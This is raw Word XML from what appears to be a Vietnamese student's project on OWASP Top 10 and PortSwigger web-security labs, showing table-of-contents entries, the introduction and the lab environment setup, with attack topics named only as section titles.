              <w:instrText xml:space="preserve"> PAGEREF _Toc182909887 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>101</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BA6F1D9" w14:textId="6944224E" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909888" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C07: Username enumeration via different responses</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909888 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>110</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E99012D" w14:textId="6007A50D" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909889" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C08: Lab: Username enumeration via response timing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909889 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>118</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5ECEF230" w14:textId="5C982D1C" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909890" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C09: 2FA simple bypass</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909890 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="442E0948" w14:textId="17F3590C" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909891" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C10: Exploiting clickjacking vulnerability to trigger DOM-based XSS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909891 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>132</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3526F3F0" w14:textId="1669E6FD" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909892" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C11: Modifying serialized objects</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909892 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>140</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3268FD6E" w14:textId="78CB8182" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909893" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C12: Basic server-side template injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909893 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>147</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00CF2421" w14:textId="593A3356" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909894" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TỔNG KẾT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909894 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>152</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25A9BE30" w14:textId="69A4C126" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909895" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TÀI LIỆU THAM KHẢO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909895 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>153</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="146895C1" w14:textId="7BF1F3C1" w:rsidR="00F67FB2" w:rsidRPr="00F41059" w:rsidRDefault="008A7AD8" w:rsidP="00F41059">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:sectPr w:rsidR="00F67FB2" w:rsidRPr="00F41059" w:rsidSect="00F67FB2">
              <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
              <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1418" w:header="720" w:footer="34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pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="630669D9" w14:textId="77777777" w:rsidR="00F41059" w:rsidRDefault="00F41059" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc182441228"/>
      <w:bookmarkStart w:id="1" w:name="_Toc182909818"/>
      <w:r w:rsidRPr="00191514">
        <w:lastRenderedPageBreak/>
        <w:t>LỜI MỞ ĐẦU</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="08178EEA" w14:textId="77777777" w:rsidR="00F41059" w:rsidRPr="00F41059" w:rsidRDefault="00F41059" w:rsidP="00F41059">
      <w:r w:rsidRPr="00F41059">
        <w:t>Với sự phát triển không ngừng của công nghệ thông tin nói chung và an ninh mạng nói riêng, ngày càng trở thành mối quan tâm hàng đầu đối với các tổ chức và cá nhân. Việc nhận diện và phòng ngừa các lỗ hổng bảo mật là yếu tố then chốt giúp duy trì an toàn và bảo mật cho các hệ thống công nghệ. Đồ án cá nhân này nhằm phân tích và khai thác 10 lỗ hổng hàng đầu theo OWASP năm 2021, giúp người đọc nắm bắt cách thức hoạt động của các loại tấn công phổ biến, cũng như các biện pháp phòng ngừa để giảm thiểu nguy cơ bị tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD25BC3" w14:textId="77777777" w:rsidR="00F41059" w:rsidRPr="00F41059" w:rsidRDefault="00F41059" w:rsidP="00F41059">
      <w:r w:rsidRPr="00F41059">
        <w:t>Đây không chỉ là một công cụ để nâng cao kiến thức cá nhân mà còn là minh chứng cho khả năng nghiên cứu và ứng dụng của bản thân trong lĩnh vực an ninh mạng, cụ thể là lĩnh vực bảo mật ứng dụng web (Web Application Security). Thông qua các bài thực hành và kịch bản tấn công được mô phỏng giống với thực tiễn, tôi mong muốn chứng minh tiềm năng và sự sẵn sàng của mình đối với các vị trí công việc trong lĩnh vực này, đồng thời góp phần nhỏ vào việc nâng cao nhận thức về bảo mật ứng dụng web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4316F685" w14:textId="77777777" w:rsidR="00F41059" w:rsidRPr="00F41059" w:rsidRDefault="00F41059" w:rsidP="00F41059">
      <w:r w:rsidRPr="00F41059">
        <w:t>Trong đồ án này, tôi tập trung chính vào việc tìm hiểu kiến thức cơ bản và nền tảng của các lỗ hổng thuộc OWASP Top 10 năm 2021. Mục tiêu là nhận biết tổng quan về các lỗ hổng web thường gặp, đồng thời đưa ra các giải pháp ngăn chặn, phòng ngừa và khắc phục nhằm giảm thiểu rủi ro cho tài sản thông qua các lỗ hổng thuộc Top 10 OWASP và các lỗ hổng bảo mật web khác. Đồ án được chia thành 3 phần chính:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FC2C5F" w14:textId="77777777" w:rsidR="00F41059" w:rsidRPr="00F41059" w:rsidRDefault="00F41059" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41059">
        <w:t xml:space="preserve">Phần A: 10 lỗ hổng OWASP TOP 10 năm 2021 (A01:2021 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41059">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F41059">
        <w:t xml:space="preserve"> A10:2021).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3F3377" w14:textId="77777777" w:rsidR="00F41059" w:rsidRPr="00F41059" w:rsidRDefault="00F41059" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41059">
        <w:t xml:space="preserve">Phần B: 5 lỗ hổng liên quan tới lĩnh vực bảo mật web (B01 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41059">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F41059">
        <w:t xml:space="preserve"> B05).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A65F35" w14:textId="77777777" w:rsidR="00F41059" w:rsidRPr="00F41059" w:rsidRDefault="00F41059" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41059">
        <w:t xml:space="preserve">Phần C: Các lỗ hổng web được tham khảo từ website PortSwigger (C01 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41059">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F41059">
        <w:t xml:space="preserve"> C12).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279F3B36" w14:textId="77777777" w:rsidR="00F41059" w:rsidRPr="00F41059" w:rsidRDefault="00F41059" w:rsidP="00F41059">
      <w:r w:rsidRPr="00F41059">
        <w:t>Nguồn tài nguyên có sẵn được đính kèm phục vụ cho các bài thực hành (lab) phần A và B, trang web PortSwigger phục vụ cho các bài thực hành (lab) phần C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AF60FC" w14:textId="77777777" w:rsidR="00F41059" w:rsidRDefault="00F41059" w:rsidP="00F41059">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16A94">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Toàn bộ nội dung trong đồ án cá nhân chỉ được phép sử dụng cho mục đích tham khảo, vui lòng không sao chép </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">và </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16A94">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sửa đổi nếu chưa được</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> sự cho</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16A94">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> phép của tác giả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CBABBF" w14:textId="77777777" w:rsidR="00F41059" w:rsidRDefault="00F41059">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD9DC28" w14:textId="77777777" w:rsidR="00F41059" w:rsidRDefault="00F41059" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc182909819"/>
      <w:r w:rsidRPr="00F41059">
        <w:lastRenderedPageBreak/>
        <w:t>THIẾT LẬP MÔI TRƯỜNG</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="3C5561C2" w14:textId="2E334EA1" w:rsidR="00D305CF" w:rsidRPr="00D13F56" w:rsidRDefault="0030151F" w:rsidP="00D13F56">
      <w:r w:rsidRPr="00D13F56">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00D305CF" w:rsidRPr="00D13F56">
        <w:t xml:space="preserve">Nguồn tài nguyên được đính kèm là: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D13F56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>owasp.tar</w:t>
      </w:r>
      <w:r w:rsidR="00D13F56" w:rsidRPr="00D13F56">
        <w:t xml:space="preserve"> để phục vụ cho các lab phần A và B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A9C8F7" w14:textId="31FA625F" w:rsidR="0030151F" w:rsidRDefault="0030151F" w:rsidP="00D13F56">
      <w:r w:rsidRPr="00D13F56">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D9C95F9" wp14:editId="1A15F1BE">
            <wp:extent cx="6151880" cy="198755"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1930957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57260" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6151880" cy="198755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3FDD90" w14:textId="77777777" w:rsidR="00E07BAA" w:rsidRDefault="00E07BAA" w:rsidP="00D13F56">
      <w:r w:rsidRPr="00E07BAA">
        <w:t xml:space="preserve">- File </w:t>
      </w:r>
      <w:r w:rsidRPr="00E07BAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sample.yaml</w:t>
      </w:r>
      <w:r w:rsidRPr="00E07BAA">
        <w:t xml:space="preserve"> phục vụ cho lab A06:2021 – Vulnerable and Outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D601A25" w14:textId="21259E8A" w:rsidR="00E07BAA" w:rsidRPr="00D13F56" w:rsidRDefault="00E07BAA" w:rsidP="00D13F56">
      <w:r w:rsidRPr="00E07BAA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15C41C31" wp14:editId="36AA9B75">
            <wp:extent cx="6151880" cy="186690"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3810"/>
            <wp:docPr id="499460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60890" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6151880" cy="186690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="228A80C4" w14:textId="357D6231" w:rsidR="00D13F56" w:rsidRDefault="00D13F56" w:rsidP="00D13F56">
      <w:r w:rsidRPr="00D13F56">
        <w:t xml:space="preserve">- Trang web PortSwigger tại: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00D13F56">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D13F56">
        <w:t xml:space="preserve"> để phục vụ cho các lab phần C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7077F463" w14:textId="24E8D8CE" w:rsidR="00CB071E" w:rsidRDefault="00CB071E" w:rsidP="00D13F56">
      <w:r>
        <w:t xml:space="preserve">- Truy cập </w:t>
      </w:r>
      <w:r w:rsidRPr="00F26440">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nguồn tài nguyên</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC503FC" w14:textId="3F50CC45" w:rsidR="00CB071E" w:rsidRDefault="00CB071E" w:rsidP="00D13F56">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00CB071E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://drive.google.com/drive/folders/1zo3QEceGxlcZVc3ZDw2sviRMis5MltHC?usp=drive_link</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="690DC0F1" w14:textId="215280A7" w:rsidR="00F26440" w:rsidRPr="00CB071E" w:rsidRDefault="00F26440" w:rsidP="00D13F56">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F26440">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
